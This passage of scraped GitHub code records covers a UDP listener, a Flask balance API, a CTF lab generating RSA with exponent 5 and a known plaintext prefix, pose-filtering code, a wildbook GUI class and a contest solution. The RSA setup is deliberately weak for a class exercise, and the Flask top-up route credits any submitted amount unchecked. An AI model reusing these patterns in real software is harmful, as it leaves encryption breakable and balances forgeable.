Utf-8 e mostrar na tela, quando disponivel.\n\nwhile True:\n senha, cliente = udp.recvfrom(1024)\n senha = senha.decode('utf-8')\n\n print (senha)\n\n","repo_name":"WillianBatista19/SDII","sub_path":"visualizacao_TV.py","file_name":"visualizacao_TV.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724628359","text":"from flask import Blueprint, jsonify, request\n\nfrom dao.mine_dao import MineDao\nfrom libs import cache\nfrom libs.cache import get_token_user_id\n\nmine_blue = Blueprint(\"mine_blue\", __name__)\n\n\n@mine_blue.route(\"/status/\", methods=[\"GET\", \"POST\"])\ndef oders():\n resp = request.get_json()\n if resp:\n token = resp.get('token')\n user_id = cache.get_token_user_id(token)\n dao = MineDao()\n data = dao.mine_query(user_id)\n if data:\n return jsonify({\n 'code': 200,\n 'msg': 'ok',\n 'data': data\n })\n return jsonify({\n 'code': 201,\n 'msg': '请求数据失败',\n })\n\n\n@mine_blue.route(\"/add/money/\", methods=(\"POST\",))\ndef add_view():\n token = request.args.get(\"token\", None)\n num_money = request.form.get('num_money')\n \n if token is None:\n return jsonify({\"code\": 201, \"msg\": \"token查询参数必须提供\"})\n u_id = get_token_user_id(token)\n dao = MineDao()\n \n bal = dao.query_balance(u_id)\n num = int(bal) + int(num_money)\n\n dao.add_balance(num, u_id)\n return jsonify({\"code\": 200, \"msg\": \"充值成功!\", \"data\": num})","repo_name":"yiguo901/yiguo_api","sub_path":"views/mine_view.py","file_name":"mine_view.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44631666903","text":"#!/usr/bin/env python3\nimport json\nfrom Crypto.Util.number import *\n\n\ndef genkeys():\n e = 5\n while True:\n p, q = getPrime(512), getPrime(512)\n n, phi = p * q, (p - 1) * (q - 1)\n if GCD(e, phi) == 1:\n d = inverse(e, phi)\n return (n, e), (n, d)\n'''\nflag = open('flag', 'rb').read()\npub, priv = genkeys()\n\nn, e = pub\n\nmessage = b\"Let me sleep, just let me sleep. Maybe go to sleep. I want to go to sleep. When can I go to sleep.\" + flag\nm = bytes_to_long(message)\nc = pow(m, e, n)\n'''\n# open('data', 'w').write(json.dumps((n, e, c)))\nprefix = b\"Let me sleep, just let me sleep. Maybe go to sleep. I want to go to sleep. When can I go to sleep.\"","repo_name":"a127000555/CTF-writeup","sub_path":"2018_NTU_course/lab10/lab-2.py","file_name":"lab-2.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42545173777","text":"#!/usr/bin/env python3\n\nfrom tqdm import tqdm, trange\nimport os.path, os\nimport numpy as np\nimport pandas as pd\nfrom numpy import array as arr\nfrom glob import glob\nfrom scipy import signal, stats\nfrom scipy.interpolate import splev, splrep\nfrom scipy.spatial.distance import cdist\nfrom scipy.spatial import cKDTree\nfrom scipy.special import logsumexp\nfrom collections import Counter\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Pool, get_context\nimport pickle\n\nfrom .common import make_process_fun, natural_keys\n\n\ndef nan_helper(y):\n return np.isnan(y), lambda z: z.nonzero()[0]\n\n\ndef remove_dups(pts, thres=7):\n tindex = np.repeat(np.arange(pts.shape[0])[:, None], pts.shape[1], axis=1)*100\n pts_ix = np.dstack([pts, tindex])\n tree = cKDTree(pts_ix.reshape(-1, 3))\n\n shape = (pts.shape[0], pts.shape[1])\n pairs = tree.query_pairs(thres)\n indices = [b for a, b in pairs]\n\n if len(pairs) == 0:\n return pts\n\n i0, i1 = np.unravel_index(indices, shape)\n pts_out = np.copy(pts)\n pts_out[i0, i1] = np.nan\n\n return pts_out\n\ndef viterbi_path(points, scores, n_back=3, thres_dist=30):\n n_frames = points.shape[0]\n\n points_nans = remove_dups(points, thres=5)\n # points_nans[scores < 0.01] = np.nan\n\n num_points = np.sum(~np.isnan(points_nans[:, :, 0]), axis=1)\n num_max = np.max(num_points)\n\n particles = np.zeros((n_frames, num_max * n_back + 1, 3), dtype='float64')\n valid = np.zeros(n_frames, dtype='int64')\n for i in range(n_frames):\n s = 0\n for j in range(n_back):\n if i-j < 0:\n break\n ixs = np.where(~np.isnan(points_nans[i-j, :, 0]))[0]\n n_valid = len(ixs)\n particles[i, s:s+n_valid, :2] = points[i-j, ixs]\n particles[i, s:s+n_valid, 2] = scores[i-j, ixs] * np.power(2.0, -j)\n s += n_valid\n if s == 0:\n particles[i, 0] = [-1, -1, 0.001] # missing point\n s = 1\n valid[i] = s\n\n ## viterbi algorithm\n n_particles = np.max(valid)\n\n T_logprob = np.zeros((n_frames, n_particles), dtype='float64')\n T_logprob[:] = -np.inf\n T_back = np.zeros((n_frames, n_particles), dtype='int64')\n\n T_logprob[0, :valid[0]] = np.log(particles[0, :valid[0], 2])\n T_back[0, :] = -1\n\n for i in range(1, n_frames):\n va, vb = valid[i-1], valid[i]\n pa = particles[i-1, :va, :2]\n pb = particles[i, :vb, :2]\n\n dists = cdist(pa, pb)\n cdf_high = stats.norm.logcdf(dists + 2, scale=thres_dist)\n cdf_low = stats.norm.logcdf(dists - 2, scale=thres_dist)\n cdfs = np.array([cdf_high, cdf_low])\n P_trans = logsumexp(cdfs.T, b=[1,-1], axis=2)\n\n P_trans[P_trans < -100] = -100\n\n # take care of missing transitions\n P_trans[pb[:, 0] == -1, :] = np.log(0.001)\n P_trans[:, pa[:, 0] == -1] = np.log(0.001)\n\n pflat = particles[i, :vb, 2]\n possible = T_logprob[i-1, :va] + P_trans\n\n T_logprob[i, :vb] = np.max(possible, axis=1) + np.log(pflat)\n T_back[i, :vb] = np.argmax(possible, axis=1)\n\n out = np.zeros(n_frames, dtype='int')\n out[-1] = np.argmax(T_logprob[-1])\n\n for i in range(n_frames-1, 0, -1):\n out[i-1] = T_back[i, out[i]]\n\n trace = [particles[i, out[i]] for i in range(n_frames)]\n trace = np.array(trace)\n\n points_new = trace[:, :2]\n scores_new = trace[:, 2]\n # scores_new[out >= num_points] = 0\n\n return points_new, scores_new\n\n\ndef viterbi_path_wrapper(args):\n jix, pts, scs, max_offset, thres_dist = args\n pts_new, scs_new = viterbi_path(pts, scs, max_offset, thres_dist)\n return jix, pts_new, scs_new\n\n\ndef load_pose_2d(fname):\n data_orig = pd.read_hdf(fname)\n scorer = data_orig.columns.levels[0][0]\n data = data_orig.loc[:, scorer]\n\n bp_index = data.columns.names.index('bodyparts')\n coord_index = data.columns.names.index('coords')\n bodyparts = list(data.columns.get_level_values(bp_index).unique())\n n_possible = len(data.columns.levels[coord_index])//3\n\n n_frames = len(data)\n n_joints = len(bodyparts)\n test = np.array(data).reshape(n_frames, n_joints, n_possible, 3)\n\n metadata = {\n 'bodyparts': bodyparts,\n 'scorer': scorer,\n 'index': data.index\n }\n\n return test, metadata\n\ndef filter_pose_viterbi(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points_full[scores_full < config['filter']['score_threshold']] = np.nan\n\n points = np.full((n_frames, n_joints, 2), np.nan, dtype='float64')\n scores = np.empty((n_frames, n_joints), dtype='float64')\n\n if config['filter']['multiprocessing']:\n n_proc_default = max(min(cpu_count() // 2, n_joints), 1)\n n_proc = config['filter'].get('n_proc', n_proc_default)\n else:\n n_proc = 1\n ctx = get_context('spawn')\n pool = ctx.Pool(n_proc)\n\n max_offset = config['filter']['n_back']\n thres_dist = config['filter']['offset_threshold']\n\n iterable = [ (jix, points_full[:, jix, :], scores_full[:, jix],\n max_offset, thres_dist)\n for jix in range(n_joints) ]\n\n results = pool.imap_unordered(viterbi_path_wrapper, iterable)\n\n for jix, pts_new, scs_new in tqdm(results, ncols=70):\n points[:, jix] = pts_new\n scores[:, jix] = scs_new\n\n pool.close()\n pool.join()\n\n return points, scores\n\n\ndef write_pose_2d(all_points, metadata, outname=None):\n points = all_points[:, :, :2]\n scores = all_points[:, :, 2]\n\n scorer = metadata['scorer']\n bodyparts = metadata['bodyparts']\n index = metadata['index']\n\n columns = pd.MultiIndex.from_product(\n [[scorer], bodyparts, ['x', 'y', 'likelihood']],\n names=['scorer', 'bodyparts', 'coords'])\n\n dout = pd.DataFrame(columns=columns, index=index)\n\n dout.loc[:, (scorer, bodyparts, 'x')] = points[:, :, 0]\n dout.loc[:, (scorer, bodyparts, 'y')] = points[:, :, 1]\n dout.loc[:, (scorer, bodyparts, 'likelihood')] = scores\n\n if outname is not None:\n dout.to_hdf(outname, 'df_with_missing', format='table', mode='w')\n\n return dout\n\n\ndef filter_pose_medfilt(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points = np.full((n_frames, n_joints, 2), np.nan, dtype='float64')\n scores = np.empty((n_frames, n_joints), dtype='float64')\n\n for bp_ix, bp in enumerate(bodyparts):\n x = points_full[:, bp_ix, 0, 0]\n y = points_full[:, bp_ix, 0, 1]\n score = scores_full[:, bp_ix, 0]\n\n xmed = signal.medfilt(x, kernel_size=config['filter']['medfilt'])\n ymed = signal.medfilt(y, kernel_size=config['filter']['medfilt'])\n\n errx = np.abs(x - xmed)\n erry = np.abs(y - ymed)\n err = errx + erry\n\n bad = np.zeros(len(x), dtype='bool')\n bad[err >= config['filter']['offset_threshold']] = True\n bad[score < config['filter']['score_threshold']] = True\n\n Xf = arr([x,y]).T\n Xf[bad] = np.nan\n\n Xfi = np.copy(Xf)\n\n for i in range(Xf.shape[1]):\n vals = Xfi[:, i]\n nans, ix = nan_helper(vals)\n # some data missing, but not too much\n if np.sum(nans) > 0 and np.mean(~nans) > 0.5 and np.sum(~nans) > 5:\n if config['filter']['spline']:\n spline = splrep(ix(~nans), vals[~nans], k=3, s=0)\n vals[nans]= splev(ix(nans), spline)\n else:\n vals[nans] = np.interp(ix(nans), ix(~nans), vals[~nans])\n Xfi[:,i] = vals\n\n points[:, bp_ix, 0] = Xfi[:, 0]\n points[:, bp_ix, 1] = Xfi[:, 1]\n # dout[scorer, bp, 'interpolated'] = np.isnan(Xf[:, 0])\n\n scores = scores_full[:, :, 0]\n\n return points, scores\n\ndef filter_pose_autoencoder_scores(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n scores_test = all_points[:, :, 0, 2]\n\n fname_model = config['filter']['autoencoder_path']\n with open(fname_model, 'rb') as f:\n mlp = pickle.load(f)\n\n scores_pred = mlp.predict_proba(scores_test)\n scores_pred_rep = np.repeat(scores_pred, n_possible, axis=1).reshape(scores_full.shape)\n\n scores_fixed = np.min([scores_pred_rep, scores_full], axis=0)\n\n return points_full, scores_fixed\n\n\ndef wrap_input(points, mean, std):\n pts_demean = (points - mean) / std\n pts_demean[~np.isfinite(pts_demean)] = 0\n # pts_demean = pts_demean - np.median(pts_demean, axis=1)[:, None]\n n_frames = pts_demean.shape[0]\n return pts_demean.reshape(n_frames, -1)\n # return np.hstack([pts_demean.reshape(n_frames, -1), scores])\n\ndef unwrap_input(X, mean, std):\n n_joints = X.shape[1] // 2\n pts_demean = X[:, :n_joints*2].reshape(-1, n_joints, 2)\n points = pts_demean * std + mean\n return points\n\n\ndef filter_pose_autoencoder_points(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points_test = all_points[:, :, 0, :2]\n scores_test = all_points[:, :, 0, 2]\n points_test[scores_test < 0.4] = np.nan\n\n fname_model = config['filter']['autoencoder_points_path']\n with open(fname_model, 'rb') as f:\n d = pickle.load(f)\n mlp = d['mlp']\n thres_low = d['thres_low']\n thres_lh = d['thres_lh']\n mean = d['mean']\n std = d['std']\n \n points_pred = unwrap_input(\n mlp.predict(wrap_input(\n points_test, mean, std)),\n mean, std)\n dist = np.linalg.norm(points_pred - points_test, axis=2)\n scores_pred = np.exp(-(dist - thres_low)/(thres_lh/2.3))\n scores_pred = np.clip(scores_pred, 0, 1)\n c = ~np.isfinite(scores_pred)\n scores_pred[c] = scores_test[c]\n\n scores_pred_rep = np.repeat(scores_pred, n_possible, axis=1).reshape(scores_full.shape)\n scores_fixed = np.min([scores_pred_rep, scores_full], axis=0)\n\n return points_full, scores_fixed\n\ndef wrap_points(points, scores):\n if len(points.shape) == 3: # n_possible = 1\n points = points[:, :, None]\n scores = scores[:, :, None]\n\n n_frames, n_joints, n_possible, _ = points.shape\n\n all_points = np.full((n_frames, n_joints, n_possible, 3), np.nan, dtype='float64')\n all_points[:, :, :, :2] = points\n all_points[:, :, :, 2] = scores\n\n return all_points\n\n\nFILTER_MAPPING = {\n 'medfilt': filter_pose_medfilt,\n 'viterbi': filter_pose_viterbi,\n 'autoencoder': filter_pose_autoencoder_scores,\n 'autoencoder_points': filter_pose_autoencoder_points\n}\n\nPOSSIBLE_FILTERS = FILTER_MAPPING.keys()\n\ndef process_session(config, session_path):\n pipeline_pose = config['pipeline']['pose_2d']\n pipeline_pose_filter = config['pipeline']['pose_2d_filter']\n filter_types = config['filter']['type']\n if not isinstance(filter_types, list):\n filter_types = [filter_types]\n\n for filter_type in filter_types:\n assert filter_type in POSSIBLE_FILTERS, \\\n \"Invalid filter type, should be one of {}, but found {}\".format(POSSIBLE_FILTERS, filter_type)\n\n pose_folder = os.path.join(session_path, pipeline_pose)\n output_folder = os.path.join(session_path, pipeline_pose_filter)\n\n pose_files = glob(os.path.join(pose_folder, '*.h5'))\n pose_files = sorted(pose_files, key=natural_keys)\n\n if len(pose_files) > 0:\n os.makedirs(output_folder, exist_ok=True)\n\n for fname in pose_files:\n basename = os.path.basename(fname)\n outpath = os.path.join(session_path,\n pipeline_pose_filter,\n basename)\n\n if os.path.exists(outpath):\n continue\n\n print(outpath)\n all_points, metadata = load_pose_2d(fname)\n\n for filter_type in filter_types:\n filter_fun = FILTER_MAPPING[filter_type]\n points, scores = filter_fun(config, all_points, metadata['bodyparts'])\n all_points = wrap_points(points, scores)\n\n write_pose_2d(all_points[:, :, 0], metadata, outpath)\n\n\nfilter_pose_all = make_process_fun(process_session)\n","repo_name":"lambdaloop/anipose","sub_path":"anipose/filter_pose.py","file_name":"filter_pose.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"77"} +{"seq_id":"72419733689","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\n\nimport utool as ut\n\nimport wbia.plottool as pt\nfrom wbia.plottool import interact_helpers as ih\nfrom wbia.plottool.abstract_interaction import AbstractInteraction\nfrom wbia.viz import viz_chip, viz_matches\n\nut.noinject(__name__, '[interact_query_decision]')\n\n\n# ==========================\n# query interaction\n# ==========================\n\nNUM_TOP = 3\n\n\nclass QueryVerificationInteraction(AbstractInteraction):\n \"\"\"\n CommandLine:\n python -m wbia.viz.interact.interact_query_decision --test-QueryVerificationInteraction --show\n python -m wbia --imgsetid 2 --inc-query --yes\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from wbia.viz.interact.interact_query_decision import * # NOQA\n >>> import wbia\n >>> cm, qreq_ = wbia.testdata_cm()\n >>> comp_aids = cm.get_top_aids(NUM_TOP)\n >>> suggest_aids = comp_aids[0:1]\n >>> qvi = QueryVerificationInteraction(\n >>> qreq_, cm, comp_aids, suggest_aids, progress_current=42, progress_total=1337)\n >>> ut.show_if_requested()\n \"\"\"\n\n def __init__(\n self,\n qreq_,\n cm,\n comp_aids,\n suggest_aids,\n progress_current=None,\n progress_total=None,\n update_callback=None,\n backend_callback=None,\n name_decision_callback=None,\n **kwargs,\n ):\n print('[matchver] __init__')\n super(QueryVerificationInteraction, self).__init__(**kwargs)\n print('[matchver] comp_aids={!r}'.format(comp_aids))\n print('[matchver] suggest_aids={!r}'.format(suggest_aids))\n self.ibs = qreq_.ibs\n self.qreq_ = qreq_\n self.cm = cm\n self.query_aid = self.cm.qaid\n self.ibs.assert_valid_aids(comp_aids, verbose=True)\n self.ibs.assert_valid_aids(suggest_aids, verbose=True)\n self.ibs.assert_valid_aids((self.query_aid,), verbose=True)\n assert len(comp_aids) <= NUM_TOP\n self.comp_aids = comp_aids\n self.suggest_aids = suggest_aids\n self.suggest_aids = None # HACK TO TURN OFF SUGGESTIONS\n self.progress_current = progress_current\n self.progress_total = progress_total\n\n def _nonefn():\n return None\n\n def _nonefn2(*args):\n return None\n\n if update_callback is None:\n update_callback = _nonefn\n if backend_callback is None:\n backend_callback = _nonefn\n if name_decision_callback is None:\n name_decision_callback = _nonefn2\n self.update_callback = (\n update_callback # if something like qt needs a manual refresh on change\n )\n self.backend_callback = backend_callback\n self.name_decision_callback = name_decision_callback\n self.aid_checkbox_states = {}\n self.other_checkbox_states = {'none': True, 'junk': False}\n self.qres_callback = kwargs.get('qres_callback', None)\n self.infer_data()\n self.show_page(bring_to_front=True)\n\n def infer_data(self):\n \"\"\"Initialize data related to the input aids\"\"\"\n ibs = self.ibs\n\n self.query_nid = ibs.get_annot_name_rowids(self.query_aid)\n self.comp_nids = ibs.get_annot_name_rowids(self.comp_aids)\n self.query_name = ibs.get_annot_names(self.query_aid)\n self.comp_names = ibs.get_annot_names(self.comp_aids)\n\n self.aid_list = [self.query_aid] + self.comp_aids\n\n # HACK: make sure that comp_aids is of length NUM_TOP\n if len(self.comp_aids) != NUM_TOP:\n self.comp_aids += [None for i in range(NUM_TOP - len(self.comp_aids))]\n\n # column for each comparasion + the none button\n # row for the query, row for the comparasions\n self.nCols = len(self.comp_aids)\n self.nRows = 2\n\n def prepare_page(self):\n figkw = {\n 'fnum': self.fnum,\n 'doclf': True,\n 'docla': True,\n }\n self.fig = pt.figure(**figkw)\n ih.disconnect_callback(self.fig, 'button_press_event')\n ih.connect_callback(self.fig, 'button_press_event', self.figure_clicked)\n # ih.connect_callback(self.fig, 'button_press_event', self.figure_clicked)\n\n def show_page(self, bring_to_front=False):\n \"\"\"Plots all subaxes on a page\"\"\"\n print('[querydec] show_page()')\n self.prepare_page()\n # Variables we will work with to paint a pretty picture\n # ibs = self.ibs\n nRows = self.nRows\n nCols = self.nCols\n\n # Plot the Comparisions\n for count, c_aid in enumerate(self.comp_aids):\n if c_aid is not None:\n px = nCols + count + 1\n title_suffix = ''\n if self.suggest_aids is not None and c_aid in self.suggest_aids:\n title_suffix = 'SUGGESTED BY IBEIS'\n self.plot_chip(c_aid, nRows, nCols, px, title_suffix=title_suffix)\n else:\n pt.imshow_null(\n fnum=self.fnum,\n pnum=(nRows, nCols, nCols + count + 1),\n title='NO RESULT',\n )\n\n # Plot the Query Chip last\n with ut.EmbedOnException():\n query_title = 'Identify This Animal'\n self.plot_chip(self.query_aid, nRows, 1, 1, title_suffix=query_title)\n\n self.show_hud()\n pt.adjust_subplots(\n top=0.88, hspace=0.12, left=0.1, right=0.9, bottom=0.1, wspace=0.3\n )\n self.draw()\n self.show()\n if bring_to_front:\n self.bring_to_front()\n\n def plot_chip(self, aid, nRows, nCols, px, **kwargs):\n \"\"\"Plots an individual chip in a subaxis\"\"\"\n ibs = self.ibs\n enable_chip_title_prefix = ut.is_developer()\n # enable_chip_title_prefix = False\n if aid in self.comp_aids:\n score = self.cm.get_annot_scores([aid])[0]\n rawscore = self.cm.get_annot_scores([aid])[0]\n title_suf = kwargs.get('title_suffix', '')\n if score != rawscore:\n if score is None:\n title_suf += '\\n score=____'\n else:\n title_suf += '\\n score=%0.2f' % score\n title_suf += '\\n rawscore=%0.2f' % rawscore\n else:\n title_suf = kwargs.get('title_suffix', '')\n if enable_chip_title_prefix:\n title_suf = '\\n' + title_suf\n\n # nid = ibs.get_annot_name_rowids(aid)\n viz_chip_kw = {\n 'fnum': self.fnum,\n 'pnum': (nRows, nCols, px),\n 'nokpts': True,\n 'show_gname': False,\n 'show_exemplar': False,\n 'show_num_gt': False,\n 'show_gname': False,\n 'title_suffix': title_suf,\n # 'text_color': kwargs.get('color'),\n ###\n # 'show_name': False,\n # 'show_aidstr': False,\n 'enable_chip_title_prefix': enable_chip_title_prefix,\n 'show_name': True,\n 'show_aidstr': True,\n 'show_viewcode': True,\n 'show_quality_text': True,\n }\n\n viz_chip.show_chip(ibs, aid, **viz_chip_kw)\n ax = pt.gca()\n if kwargs.get('make_buttons', True):\n divider = pt.ensure_divider(ax)\n butkw = {'divider': divider, 'size': '13%'}\n\n self.aid2_ax = {}\n self.aid2_border = {}\n\n if aid in self.comp_aids:\n callback = partial(self.select, aid)\n self.append_button('Select This Animal', callback=callback, **butkw)\n # Hack to toggle colors\n if aid in self.aid_checkbox_states:\n # If we are selecting it, then make it green, otherwise change it back to grey\n if self.aid_checkbox_states[aid]:\n border = pt.draw_border(ax, color=(0, 1, 0), lw=4)\n else:\n border = pt.draw_border(ax, color=(0.7, 0.7, 0.7), lw=4)\n self.aid2_border[aid] = border\n else:\n self.aid_checkbox_states[aid] = False\n self.append_button('Examine', callback=partial(self.examine, aid), **butkw)\n\n def examine(self, aid, event=None):\n print(' examining aid %r against the query result' % aid)\n figtitle = 'Examine a specific image against the query'\n\n # fnum = 510\n fnum = pt.next_fnum()\n fig = pt.figure(fnum=fnum, pnum=(1, 1, 1), doclf=True, docla=True)\n # can cause freezes should be False\n INTERACT_EXAMINE = False\n if INTERACT_EXAMINE:\n # from wbia.viz.interact import interact_matches\n # fig = interact_matches.ishow_matches(self.ibs, self.cm, aid, figtitle=figtitle, fnum=fnum)\n fig = self.cm.ishow_matches(self.ibs, aid, figtitle=figtitle, fnum=fnum)\n print('Finished interact')\n # this is only relevant to matplotlib.__version__ < 1.4.2\n # raise Exception(\n # 'BLACK MAGIC: error intentionally included as a workaround that seems'\n # 'to fix a gui hang on certain computers.')\n else:\n viz_matches.show_matches(self.ibs, self.cm, aid, figtitle=figtitle)\n fig.show()\n\n def select(self, aid, event=None):\n print(' selected aid %r as best choice' % aid)\n state = self.aid_checkbox_states[aid]\n self.aid_checkbox_states[aid] = not state\n for key in self.other_checkbox_states:\n self.other_checkbox_states[key] = False\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def select_none(self, event=None):\n for aid in self.comp_aids:\n self.aid_checkbox_states[aid] = False\n self.other_checkbox_states['none'] = True\n self.other_checkbox_states['junk'] = False\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def select_junk(self, event=None):\n for aid in self.comp_aids:\n self.aid_checkbox_states[aid] = False\n self.other_checkbox_states['none'] = False\n self.other_checkbox_states['junk'] = True\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def quit(self, event=None):\n self.close()\n\n def show_hud(self):\n \"\"\"Creates heads up display\"\"\"\n # Button positioners\n hl_slot, hr_slot = pt.make_bbox_positioners(\n y=0.02, w=0.16, h=3 * ut.PHI_B ** 4, xpad=0.05, startx=0, stopx=1\n )\n\n select_none_text = 'None of these'\n if self.suggest_aids is not None and len(self.suggest_aids) == 0:\n select_none_text += '\\n(SUGGESTED BY IBEIS)'\n none_tup = self.append_button(\n select_none_text, callback=partial(self.select_none), rect=hl_slot(0)\n )\n # Draw boarder around the None of these button\n none_button_axis = none_tup[1]\n if self.other_checkbox_states['none']:\n pt.draw_border(none_button_axis, color=(0, 1, 0), lw=4, adjust=False)\n else:\n pt.draw_border(none_button_axis, color=(0.7, 0.7, 0.7), lw=4, adjust=False)\n\n select_junk_text = 'Junk Query Image'\n junk_tup = self.append_button(\n select_junk_text, callback=partial(self.select_junk), rect=hl_slot(1)\n )\n # Draw boarder around the None of these button\n junk_button_axis = junk_tup[1]\n if self.other_checkbox_states['junk']:\n pt.draw_border(junk_button_axis, color=(0, 1, 0), lw=4, adjust=False)\n else:\n pt.draw_border(junk_button_axis, color=(0.7, 0.7, 0.7), lw=4, adjust=False)\n\n # Add other HUD buttons\n self.append_button('Quit', callback=partial(self.quit), rect=hr_slot(0))\n self.append_button(\n 'Confirm Selection', callback=partial(self.confirm), rect=hr_slot(1)\n )\n\n if self.progress_current is not None and self.progress_total is not None:\n self.progress_string = (\n str(self.progress_current) + '/' + str(self.progress_total)\n )\n else:\n self.progress_string = ''\n figtitle_fmt = \"\"\"\n Animal Identification {progress_string}\n \"\"\"\n figtitle = figtitle_fmt.format(**self.__dict__) # sexy: using obj dict as fmtkw\n pt.set_figtitle(figtitle)\n\n def confirm(self, event=None):\n \"\"\"\n\n CommandLine:\n python -m wbia.viz.interact.interact_query_decision --test-confirm\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from wbia.viz.interact.interact_query_decision import * # NOQA\n >>> import utool as ut\n >>> # build test data\n >>> import wbia\n >>> ibs = wbia.opendb('testdb1')\n >>> self = ibs\n >>> self.ibs = ibs\n >>> selected_aids = ut.get_list_column(ibs.get_name_aids(ibs.get_valid_nids()), 0)\n >>> comfirm_res = 'jeff'\n >>> # execute function\n >>> #result = self.confirm(event)\n >>> # verify results\n >>> #print(result)\n \"\"\"\n import wbia.guitool as gt\n\n print('[interact_query_decision] Confirming selected animals.')\n\n selected_aids = [\n aid\n for aid in self.comp_aids\n if aid is not None and self.aid_checkbox_states[aid]\n ]\n if len(selected_aids) == 0:\n print('[interact_query_decision] Confirming no match.')\n chosen_aids = []\n if self.other_checkbox_states['none']:\n chosen_aids = 'newname'\n elif self.other_checkbox_states['junk']:\n chosen_aids = 'junk'\n else:\n msg = 'INTERACT_QUERY_DECISION IMPOSSIBLE STATE'\n raise AssertionError(msg)\n elif len(selected_aids) == 1:\n print('[interact_query_decision] Confirming single match')\n chosen_aids = selected_aids\n else:\n print('[interact_query_decision] Confirming merge')\n msg = ut.textblock(\n \"\"\"\n You have selected more than one animal as a match to the query\n animal. By doing this you are telling IBEIS that these are ALL\n the SAME ANIMAL. \\n\\n\\nIf this is not what you want, click\n Cancel. If it is what you want, choose one of the names below\n as the name to keep.\n \"\"\"\n )\n selected_names = self.ibs.get_annot_names(selected_aids)\n options = selected_names\n parent = None\n title = 'Confirm Merge'\n merge_name = gt.user_option(parent, msg=msg, title=title, options=options)\n if merge_name is None:\n print('[interact_query_decision] cancelled merge')\n self.update_callback()\n self.backend_callback()\n self.show_page()\n return\n else:\n print('[interact_query_decision] confirmed merge')\n is_merge_name = [merge_name == name_ for name_ in selected_names]\n chosen_aids = ut.sortedby(selected_aids, is_merge_name)[::-1]\n\n print('[interact_query_decision] Calling update callbacks')\n self.update_callback()\n self.backend_callback()\n print('[interact_query_decision] Calling decision callback')\n print(\n '[interact_query_decision] self.name_decision_callback = %r'\n % (self.name_decision_callback,)\n )\n if isinstance(chosen_aids, str):\n # hack for string non-match commands\n chosen_names = chosen_aids\n else:\n chosen_names = self.ibs.get_annot_names(chosen_aids)\n self.name_decision_callback(chosen_names)\n print(\n '[interact_query_decision] sent name_decision_callback(chosen_names=%r)'\n % (chosen_names,)\n )\n\n def figure_clicked(self, event=None):\n import wbia.guitool as gt\n from wbia.viz import viz_helpers as vh\n\n ax = event.inaxes\n if ih.clicked_inside_axis(event):\n viztype = vh.get_ibsdat(ax, 'viztype')\n if viztype == 'chip':\n aid = vh.get_ibsdat(ax, 'aid')\n print('... aid=%r' % aid)\n if event.button == 3: # right-click\n from wbia.viz.interact import interact_chip\n\n height = self.fig.canvas.geometry().height()\n qpoint = gt.newQPoint(event.x, height - event.y)\n if self.qreq_ is None:\n config2_ = None\n else:\n if aid in self.qreq_.qaids:\n config2_ = self.qreq_.query_config2_\n else:\n config2_ = self.qreq_.data_config2_\n callback_list = interact_chip.build_annot_context_options(\n self.ibs, aid, refresh_func=self.show_page, config2_=config2_\n )\n gt.popup_menu(self.fig.canvas, qpoint, callback_list)\n # interact_chip.show_annot_context_menu(\n # self.ibs, aid, self.fig.canvas, qpoint, refresh_func=self.show_page)\n # self.show_page()\n # ibs.print_annotation_table()\n print(ut.repr2(event.__dict__))\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/viz/interact/interact_query_decision.py","file_name":"interact_query_decision.py","file_ext":"py","file_size_in_byte":17472,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"8231025375","text":"import collections\nimport math\n\nK = int(input())\n\ndef main(K):\n for i in range(2*10**6)[1:]:\n K = int(K/math.gcd(K,i))\n if K == 1:\n return i\n return K\n\nprint(main(K))","repo_name":"SWEET-creator/Atcoder","sub_path":"AtCoder_Beginner_Contest/280/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2396323979","text":"from setuptools import setup, find_packages\nimport pathlib\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name='build-flask-app',\n description='Set up a modern flask web server by running one command.',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n version='0.1.0',\n license='MIT',\n author='Kushagra Bainsla',\n author_email='kushagrabainsla@gmail.com',\n url='https://github.com/Kushagrabainsla/build-flask-app',\n install_requires=[\n 'Flask',\n 'Flask-SQLAlchemy',\n 'Flask-SocketIO',\n 'gunicorn',\n 'eventlet',\n 'gevent',\n 'dnspython',\n 'pymongo',\n 'Flask-PyMongo',\n 'PyInquirer',\n 'termcolor',\n 'flask-cors',\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points = {\n 'console_scripts': ['build-flask-app=build_flask_app.main:main'],\n 